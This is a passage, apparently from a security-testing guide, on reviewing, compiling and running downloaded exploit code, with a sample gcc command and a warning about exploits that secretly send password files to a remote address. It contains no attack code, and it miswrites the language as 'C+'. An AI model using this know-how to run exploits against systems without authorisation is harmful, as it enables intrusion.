Open up the script code file and review the runtime instructions located in the top comments. Reviewing the code also allows you to ensure that no secret Trojans or malware are lurking inside. I've seen exploit code which did nothing but steal the current user’s password file and send it to a remote IP address. If you can’t analyze the code adequately beforehand, run it in a virtual environment or don’t run it at all.
Other types of exploits must be compiled into an executable before testing. Some malware samples can be compiled by almost any related language compiler, but others must be created by a particular compiler (and will say so in the starting comments). For instance, C+ programs often can be compiled into executable form using any C+ compiler. In the Linux world, I often use GNU’s C compiler, gcc, by typing something like this:
gcc –o outputfilename inputfilename.c
The –o indicates the following text will be the output file name of the executable.
Sometimes a compiler will need additional support files and libraries. The exploit code author or their code comments will usually indicate this; if not, troubleshoot your compiler’s errors and try again.
If you’re not one to compile code, download precompiled exploit code. Without reviewing the source code yourself and compiling it by hand, however, you’ll never know if it contains other malicious commands or bugs. Exploit code authors often disable their exploit code slightly to discourage script kiddies from running it so easily. By requiring some investigative work on behalf of the eventual user, they figure the increased level of expertise needed will dissuade overexuberant hacker wannabes.